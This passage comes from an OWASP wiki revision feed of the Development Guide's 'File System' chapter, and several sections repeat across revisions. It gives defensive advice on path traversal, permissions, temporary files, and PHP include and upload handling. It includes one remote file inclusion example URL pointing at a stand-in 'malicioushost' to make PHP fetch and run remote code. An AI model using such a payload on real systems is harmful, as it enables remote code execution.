The function define() defines a constant. Constants are not prefixed by a dollar sign ($) and thus we cannot break this by something like: functions.php?SECURITY_CHECK=1. Although not so common these days, you can still come across PHP files with the .inc extension. These files are only meant to be included by other files. What is often overlooked is that these files, if called directly, do not go through the PHP preprocessor, and thus are sent in clear text. We should be consistent and stick with one extension that we know is processed by PHP. The .php extension is recommended.&lt;br /&gt;
&lt;br /&gt;
==File upload  ==&lt;br /&gt;
&lt;br /&gt;
PHP is a feature-rich language, and one of its built-in features is automatic handling of file uploads. When a file is uploaded to a PHP page, it is automatically saved to a temporary directory. New global variables describing the uploaded file will be available within the page. Consider the following HTML code presenting a user with an upload form: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;form action=&amp;quot;page.php&amp;quot; method=&amp;quot;POST&amp;quot; enctype=&amp;quot;multipart/form-data&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;file&amp;quot; name=&amp;quot;testfile&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Upload file&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After submitting the above form, new variables will be available to page.php based on the “testfile” name. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Variables set by PHP and what they will contain: &lt;br /&gt;
&lt;br /&gt;
// A temporary path/filename generated by PHP. This is where the file is&lt;br /&gt;
&lt;br /&gt;
// saved until we move it or it is removed by PHP if we choose not to do anything with it. &lt;br /&gt;
&lt;br /&gt;
$testfile &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. &lt;br /&gt;
&lt;br /&gt;
$testfile_name&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_size &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. For example:  “image/jpeg”. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_type 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A common approach is to check if $testfile is set and, if it is, start working on it right away, maybe copying it to a public directory accessible from any browser. You probably already guessed it: this is a very insecure way of working with uploaded files. The $testfile variable does not have to be a path to an uploaded file – it could come from GET, POST, COOKIE, and so on. A malicious user could make us work on any file on the server, which is not very pleasant. We should not assume anything about the register_globals directive; it could be on or off for all we care, our code should work with or without it and, most importantly, be just as secure regardless of configuration settings. So the first thing we should do is to use the $_FILES array:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// The temporary filename generated by PHP &lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['tmp_name'] &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. &lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['name'] &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. &lt;br /&gt;
&lt;br /&gt;
// For example:  “image/jpeg “. 	&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['type']&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes.&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['size'] 	 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The built-in functions is_uploaded_file() and/or move_uploaded_file() should be called with $_FILES['testfile']['tmp_name'] to make sure that the file really was uploaded by HTTP POST. The following example shows a straightforward way of working with uploaded files: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ( is_uploaded_file($_FILES['testfile']['tmp_name']) ) {&lt;br /&gt;
&lt;br /&gt;
// Check if the file size is what we expect (optional) &lt;br /&gt;
&lt;br /&gt;
if ( $_FILES['testfile']['size'] &amp;gt; 102400 ) {&lt;br /&gt;
&lt;br /&gt;
// The size cannot be over 100kB, output error message and exit.&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// Validate the file name and extension based on the original name in $_FILES['testfile']['name'];&lt;br /&gt;
&lt;br /&gt;
// we do not want anyone to be able to upload .php files, for example.&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
// Everything is okay so far, move the file with move_uploaded_file()&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Note: We should always check that a variable in the superglobals arrays is set with isset() before accessing it. I chose not to do that in the above examples because I wanted to keep them as simple as possible.&lt;br /&gt;
&lt;br /&gt;
==Old, unreferenced files ==&lt;br /&gt;
&lt;br /&gt;
It is common for system administrators and developers to use editors and other tools which leave behind temporary or backup files. If the file extensions or access control permissions differ from those of the originals, an attacker may be able to read source or configuration data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Check the file system for:&lt;br /&gt;
&lt;br /&gt;
* Temporary files (such as core, ~foo, blah.tmp, and so on) created by editors or crashed programs&lt;br /&gt;
&lt;br /&gt;
* Folders called “backup”, “old”, or “Copy of …”&lt;br /&gt;
&lt;br /&gt;
* Files with additional extensions, such as foo.php.old&lt;br /&gt;
&lt;br /&gt;
* Temporary folders with intermediate results or cache templates&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use source code control to prevent the need to keep old copies of files around&lt;br /&gt;
&lt;br /&gt;
* Periodically ensure that all files in the web root are actually required&lt;br /&gt;
&lt;br /&gt;
* Ensure that the application’s temporary files are not accessible from the web root&lt;br /&gt;
&lt;br /&gt;
==Second Order Injection ==&lt;br /&gt;
&lt;br /&gt;
If the web application creates a file that is operated on by another process, typically a batch or scheduled process, the second process may be vulnerable to attack. It is a rare application that ensures input to background processes is validated prior to first use.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application use background / batch / scheduled processes to work on user supplied data?&lt;br /&gt;
&lt;br /&gt;
* Does this program validate the user input prior to operating on it?&lt;br /&gt;
&lt;br /&gt;
* Does this program communicate with other business significant processes or otherwise approve transactions? &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure that all behind the scenes programs check user input prior to operating on it&lt;br /&gt;
&lt;br /&gt;
* Run the application with the least privilege – in particular, the batch application should not require write privileges to any front end files, the network, or similar&lt;br /&gt;
&lt;br /&gt;
* Use inbuilt language or operating system features to curtail the resources and features which the background application may use. For example, batch programs rarely if ever require network access. &lt;br /&gt;
&lt;br /&gt;
* Consider the use of host based intrusion detection systems and anti-virus systems to detect unauthorized file creation. &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Klein, A., ''Insecure Indexing''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.webappsec.org/projects/articles/022805-clean.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* MySQL world readable log files&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/advisories/3803&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Oracle 8i and 9i Servlet allows remote file viewing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://online.securityfocus.com/advisories/3964&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
==File System ==&lt;br /&gt;
&lt;br /&gt;
Even with an authentication system in place to protect your content, if file permissions are set incorrectly an attacker could browse directly to your application source code or protected documents.  The section below gives guidance in setting file system permissions and directories to reduce your risk of exposure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Permissions'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Restrict access to the \CFIDE directory to specific IP addresses and user groups/accounts.&lt;br /&gt;
&lt;br /&gt;
Remove the \cfdocs directory. Sample applications are installed by default in the cfdocs directory and are accessible to anyone. These applications should never be available on a production server.&lt;br /&gt;
&lt;br /&gt;
Ensure that directory browsing is disabled.&lt;br /&gt;
&lt;br /&gt;
Ensure that proper access controls are set on web application content. The following settings assume a user account called “cfuser” has been created to run the ColdFusion service.  In addition, if you are using a directory or operating system authentication service, these settings may need to be adjusted.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Scripts (.cfm, .cfml, .cfc, .jsp, and others)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Execute); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Static content (.txt, .gif, .jpg, .html, .xml)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Read); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Upload'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upload files to a destination outside of the web application directory.&lt;br /&gt;
&lt;br /&gt;
Enable virus scan on the destination directory.&lt;br /&gt;
&lt;br /&gt;
Do not allow user input to specify the destination directory or file name of uploaded documents.&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:File System]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File_System&amp;diff=59851</id>
		<title>File System</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File_System&amp;diff=59851"/>
				<updated>2009-05-02T11:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Includes and Remote files */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that access to the local file system of any of the systems is protected from unauthorized creation, modification, or deletion.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity&lt;br /&gt;
&lt;br /&gt;
DS11.20 – Continued integrity of stored data&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The file system is a fertile ground for average attackers and script kiddies alike. Attacks can be devastating for the average site, and they are often some of the easiest attacks to perform. &lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Use “chroot” jails on Unix platforms&lt;br /&gt;
&lt;br /&gt;
* Use minimal file system permissions on all platforms&lt;br /&gt;
&lt;br /&gt;
* Consider the use of read-only file systems (such as CD-ROM or locked USB key) if practical&lt;br /&gt;
&lt;br /&gt;
==Defacement ==&lt;br /&gt;
&lt;br /&gt;
Defacement is one of the most common attacks against web sites. An attacker uses a tool or technique to upload hostile content over the top of existing files or, via configuration mistakes, as new files. Defacement can be acutely embarrassing, resulting in reputation loss and loss of trust with users. &lt;br /&gt;
&lt;br /&gt;
There are many defacement archives on the Internet. Most defacements occur due to poor patching of vulnerable web servers, but the next most common cause is web application vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Is your system up to date? &lt;br /&gt;
&lt;br /&gt;
* Does the file system allow writing via the web user to the web content (including directories)?&lt;br /&gt;
&lt;br /&gt;
* Does the application write files with user supplied file names?&lt;br /&gt;
&lt;br /&gt;
* Does the application use file system calls or execute system commands (such as exec() or xp_cmdshell())? &lt;br /&gt;
&lt;br /&gt;
* Would any of the execution or file system calls allow the execution of additional, unauthorized commands? See the OS Injection section for more details.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure or recommend that the underlying operating system and web application environment are kept up to date&lt;br /&gt;
&lt;br /&gt;
* Ensure the application files and resources are read-only&lt;br /&gt;
&lt;br /&gt;
* Ensure the application does not take user supplied file names when saving or working on local files&lt;br /&gt;
&lt;br /&gt;
* Ensure the application properly checks all user supplied input so that additional commands cannot be run&lt;br /&gt;
&lt;br /&gt;
==Path traversal  ==&lt;br /&gt;
&lt;br /&gt;
All but the most simple web applications have to include local resources, such as images, themes, other scripts, and so on. Every time a resource or file is included by the application, there is a risk that an attacker may be able to include a file or remote resource you didn’t authorize. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect code containing file open, include, file create, file delete, and so on&lt;br /&gt;
&lt;br /&gt;
* Determine if it contains unsanitized user input. &lt;br /&gt;
&lt;br /&gt;
* If so, the application is likely to be at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Prefer working without user input when using file system calls&lt;br /&gt;
&lt;br /&gt;
* Use indexes rather than actual portions of file names when templating or using language files (i.e., value 5 from the user submission maps to “Czechoslovakian”, rather than expecting the user to send back “Czechoslovakian”)&lt;br /&gt;
&lt;br /&gt;
* Ensure the user cannot supply all parts of the path – surround it with your own path-handling code&lt;br /&gt;
&lt;br /&gt;
* Validate the user’s input by only accepting known good – do not sanitize the data&lt;br /&gt;
&lt;br /&gt;
* Use chrooted jails and code access policies to restrict where the files can be obtained or saved to&lt;br /&gt;
&lt;br /&gt;
See the OWASP article on [[Path Traversal]] for a description of the attack.&lt;br /&gt;
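&lt;br /&gt;
The whitelisting-by-index approach above can be sketched in PHP as follows. The language map, the /inc/lang/ prefix, and the langFile() helper are illustrative assumptions, not a fixed API:&lt;br /&gt;

```php
// Choose an include file by whitelist index, never by user-supplied name.
$aLanguages = array(1 => 'english.php', 2 => 'german.php', 3 => 'czech.php');

function langFile($aLanguages, $sRaw) {
    $iChoice = (int) $sRaw;   // the cast defeats "../"-style input outright
    if (array_key_exists($iChoice, $aLanguages)) {
        return '/inc/lang/' . $aLanguages[$iChoice];
    }
    return '/inc/lang/' . $aLanguages[1];   // fail safe to a known-good default
}
```

The key point is that the user's input only ever selects an entry from a map we control; no part of it reaches the file system.&lt;br /&gt;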
&lt;br /&gt;
==Insecure permissions ==&lt;br /&gt;
&lt;br /&gt;
Many developers take short cuts to get their applications to work, and many system administrators do not fully understand the risks of permissive file system ACLs.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Can other local users on the system read, modify, or delete files used by the web application?&lt;br /&gt;
&lt;br /&gt;
If so, it is highly likely that the application is vulnerable to local and remote attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use the tightest possible permissions when developing and deploying web applications&lt;br /&gt;
&lt;br /&gt;
* Many web applications can be deployed on read-only media, such as CD-ROMs &lt;br /&gt;
&lt;br /&gt;
* Consider using chroot jails and code access security policies to restrict and control the location and type of file operations even if the system is misconfigured&lt;br /&gt;
&lt;br /&gt;
* Remove all “Everyone: Full Control” ACLs on Windows, and all mode 777 (world-writable) directories or mode 666 (world-writable) files on Unix systems&lt;br /&gt;
&lt;br /&gt;
* Strongly consider removing “Guest”, “everyone,” and world readable permissions wherever possible&lt;br /&gt;
&lt;br /&gt;
==Insecure Indexing ==&lt;br /&gt;
&lt;br /&gt;
Desktop search tools, such as the Google Desktop search engine and Spotlight on the Macintosh, allow users to easily find anything on their hard drives. This same wonderful technology allows remote attackers to determine exactly what you have hidden away deep in your application’s guts. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use Google and a range of other search engines to find something on your web site, such as a meta tag or a hidden file&lt;br /&gt;
&lt;br /&gt;
* If a file is found, your application is at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use robots.txt – this will prevent most search engines from looking any further than what you have in mind&lt;br /&gt;
&lt;br /&gt;
* Tightly control the activities of any search engine you run for your site, such as the IIS Search Engine, Sharepoint, Google appliance, and so on. &lt;br /&gt;
&lt;br /&gt;
* If you don’t need a searchable index of your web site, disable any search functionality which may be enabled.&lt;br /&gt;
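&lt;br /&gt;
A minimal robots.txt (the paths below are illustrative assumptions) asks crawlers to stay out of sensitive areas:&lt;br /&gt;

```
# robots.txt, served from the web root -- a request, not an access control
User-agent: *
Disallow: /admin/
Disallow: /inc/
Disallow: /backup/
```

Remember that robots.txt is purely advisory: well-behaved search engines honour it, but attackers will read it as a map of interesting paths, so it complements rather than replaces access control.&lt;br /&gt;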
&lt;br /&gt;
==Unmapped files ==&lt;br /&gt;
&lt;br /&gt;
Web application frameworks will interpret only their own file types; the web server renders all other content as HTML or as plain text. This may disclose secrets and configuration data which an attacker may be able to use to successfully attack the application.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Upload a file that is not normally visible, such as a configuration file (config.xml or similar), and request it using a web browser. If the file’s contents are rendered or exposed, then the application is at risk. &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Remove or move all files that do not belong in the web root.&lt;br /&gt;
&lt;br /&gt;
* Rename include files to have a normal, processed extension (such as foo.inc → foo.jsp or foo.aspx).&lt;br /&gt;
&lt;br /&gt;
* Map all files that need to remain, such as .xml or .cfg, to an error handler or a renderer that will not disclose the file contents. This may need to be done in both the web application framework’s configuration and the web server’s configuration.&lt;br /&gt;
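&lt;br /&gt;
As one illustration of such a mapping (assuming Apache 2.4 syntax; IIS and other servers offer equivalent handler or request-filtering configuration), file types that should never be served raw can be refused outright:&lt;br /&gt;

```
# Refuse to serve raw configuration and include files
&amp;lt;FilesMatch "\.(xml|cfg|inc|log)$"&amp;gt;
    Require all denied
&amp;lt;/FilesMatch&amp;gt;
```

The extension list is an example; build it from the actual non-content file types present under your web root.&lt;br /&gt;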
&lt;br /&gt;
==Temporary files ==&lt;br /&gt;
&lt;br /&gt;
Applications occasionally need to write results or reports to disk. Temporary files, if exposed to unauthorized users, may expose private and confidential information, or allow an attacker to become an authorized user depending on the level of vulnerability.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Determine if your application uses temporary files. If it does, check the following:&lt;br /&gt;
&lt;br /&gt;
* Are the files within the web root? If so, can they be retrieved using just a browser? If so, can the files be retrieved without being logged on? &lt;br /&gt;
&lt;br /&gt;
* Are old files exposed? Is there a garbage collector or other mechanism deleting old files?&lt;br /&gt;
&lt;br /&gt;
* Does retrieval of the files expose the application’s workings, or expose private data?&lt;br /&gt;
&lt;br /&gt;
The level of vulnerability is derived from the asset classification assigned to the data.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Temporary files do not always need protection from unauthorized access. For medium- to high-risk usage, particularly if the files expose the inner workings of your application or expose private user data, the following controls should be considered:&lt;br /&gt;
&lt;br /&gt;
* The temporary file routines could be re-written to generate the content on the fly rather than storing on the file system.&lt;br /&gt;
&lt;br /&gt;
* Ensure that all resources are not retrievable by unauthenticated users, and that users are authorized to retrieve only their own files.&lt;br /&gt;
&lt;br /&gt;
* Use a “garbage collector” to delete old temporary files, either at the end of a session or within a timeout period, such as 20 minutes.&lt;br /&gt;
&lt;br /&gt;
* If deployed under Unix-like operating systems, use chroot jails to isolate the application from the primary operating system. On Windows, use the inbuilt ACL support to prevent the IIS users from retrieving or overwriting the files directly.&lt;br /&gt;
&lt;br /&gt;
* Move the files to outside the web root to prevent browser-only attacks.&lt;br /&gt;
&lt;br /&gt;
* Use random file names to decrease the likelihood of a brute-force guessing attack.&lt;br /&gt;
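&lt;br /&gt;
The last two points can be sketched in PHP, assuming a modern PHP with random_bytes() and an application directory outside the web root (/var/app/tmp is an illustrative path):&lt;br /&gt;

```php
// Store temporary output outside the web root, under an unguessable name.
$sTmpDir  = '/var/app/tmp';                       // not reachable by a browser
$sTmpName = bin2hex(random_bytes(16)) . '.tmp';   // 128 bits of randomness
$sTmpPath = $sTmpDir . '/' . $sTmpName;
```

A browser-only attacker can neither reach the directory nor guess the name, so even a missing authorization check fails safe.&lt;br /&gt;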
&lt;br /&gt;
==PHP ==&lt;br /&gt;
&lt;br /&gt;
==Includes and Remote files  ==&lt;br /&gt;
&lt;br /&gt;
The PHP functions include() and require() provide an easy way of including and evaluating files. When a file is included, the code it contains inherits the variable scope of the line on which the include statement was executed. All variables available at that line will be available within the included file. Conversely, variables defined in the included file will be available to the calling page within the current scope. The included file does not have to be a file on the local computer. If the allow_url_fopen directive is enabled in php.ini, you can specify the file to be included using a URL. &lt;br /&gt;
&lt;br /&gt;
PHP will get it via HTTP instead of a local pathname. While this is a nice feature it can also be a big security risk. &lt;br /&gt;
&lt;br /&gt;
'''Note: The allow_url_fopen directive is enabled by default. '''&lt;br /&gt;
&lt;br /&gt;
A common mistake is to forget that every file can be called directly; that is, a file written to be included may instead be requested directly by a malicious user. An example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In the above example, functions.php is not meant to be called directly, so it assumes the calling page sets $sIncludePath. By creating a file called datetime.php or filesystem.php on another server (and turning off PHP processing on that server) we could call functions.php like the following:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
functions.php?sIncludePath=http://www.malicioushost.com/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PHP would happily download datetime.php from the other server and execute it, which means a malicious user could execute code of his/her choice within functions.php. I would recommend against includes within includes (as in the example above); in my opinion, it makes the code harder to understand and to get an overview of. Right now, we want to make the above code safe, and to do that we make sure that functions.php really is called from file.php. The code below shows one solution: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
define('SECURITY_CHECK', true);&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
if ( !defined('SECURITY_CHECK') ) {&lt;br /&gt;
&lt;br /&gt;
// Not included via file.php: output an error message and exit.&lt;br /&gt;
&lt;br /&gt;
exit('Direct access is not allowed.');&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php'); 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The function define() defines a constant. Constants are not prefixed by a dollar sign ($) and thus we cannot break this by something like: functions.php?SECURITY_CHECK=1. Although not so common these days, you can still come across PHP files with the .inc extension. These files are only meant to be included by other files. What is often overlooked is that these files, if called directly, do not go through the PHP preprocessor, and thus are sent in clear text. We should be consistent and stick with one extension that we know is processed by PHP. The .php extension is recommended.&lt;br /&gt;
&lt;br /&gt;
==File upload  ==&lt;br /&gt;
&lt;br /&gt;
PHP is a feature-rich language, and one of its built-in features is automatic handling of file uploads. When a file is uploaded to a PHP page, it is automatically saved to a temporary directory. New global variables describing the uploaded file will be available within the page. Consider the following HTML code presenting a user with an upload form: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;form action="page.php" method="POST" enctype="multipart/form-data"&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type="file" name="testfile" /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type="submit" value="Upload file" /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After submitting the above form, new variables will be available to page.php based on the “testfile” name. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Variables set by PHP and what they will contain: &lt;br /&gt;
&lt;br /&gt;
// A temporary path/filename generated by PHP. This is where the file is&lt;br /&gt;
&lt;br /&gt;
// saved until we move it or it is removed by PHP if we choose not to do anything with it. &lt;br /&gt;
&lt;br /&gt;
$testfile &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. &lt;br /&gt;
&lt;br /&gt;
$testfile_name&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_size &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. For example:  “image/jpeg”. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_type 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A common approach is to check if $testfile is set and, if it is, to start working on it right away, perhaps copying it to a public directory accessible from any browser. You probably already guessed it: this is a very insecure way of working with uploaded files. The $testfile variable does not have to be a path to an uploaded file; it could come from GET, POST, COOKIE, etc., and a malicious user could make us work on any file on the server. We should not assume anything about the register_globals directive: it could be on or off, our code should work either way, and most importantly it should be just as secure regardless of configuration settings. So the first thing we should do is use the $_FILES array:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// The temporary filename generated by PHP &lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['tmp_name'] &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system.&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['name'] &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. &lt;br /&gt;
&lt;br /&gt;
// For example:  “image/jpeg “. 	&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['type']&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes.&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['size'] 	 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The built-in functions is_uploaded_file() and/or move_uploaded_file() should be called with $_FILES['testfile']['tmp_name'] to make sure that the file really was uploaded via HTTP POST. The following example shows a straightforward way of working with uploaded files: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ( is_uploaded_file($_FILES['testfile']['tmp_name']) ) {&lt;br /&gt;
&lt;br /&gt;
// Check if the file size is what we expect (optional) &lt;br /&gt;
&lt;br /&gt;
if ( $_FILES['testfile']['size'] &amp;gt; 102400 ) {&lt;br /&gt;
&lt;br /&gt;
// The size cannot be over 100 KB: output an error message and exit. 	        ...&lt;br /&gt;
&lt;br /&gt;
}    &lt;br /&gt;
&lt;br /&gt;
// Validate the file name and extension based on the original name in $_FILES['testfile']['name'], &lt;br /&gt;
&lt;br /&gt;
// we do not want anyone to be able to upload .php files for example. 	   ...&lt;br /&gt;
&lt;br /&gt;
// Everything is okay so far, move the file with move_uploaded_file 	  &lt;br /&gt;
&lt;br /&gt;
... &lt;br /&gt;
&lt;br /&gt;
} 	&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Note: We should always check if a variable in the superglobals arrays is set with isset() before accessing it. I choose not to do that in the above examples because I wanted to keep them as simple as possible.&lt;br /&gt;
&lt;br /&gt;
==Old, unreferenced files ==&lt;br /&gt;
&lt;br /&gt;
It is common for system administrators and developers to use editors and other tools which leave temporary and backup files behind. If the file extensions or access control permissions change, an attacker may be able to read source or configuration data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Check the file system for:&lt;br /&gt;
&lt;br /&gt;
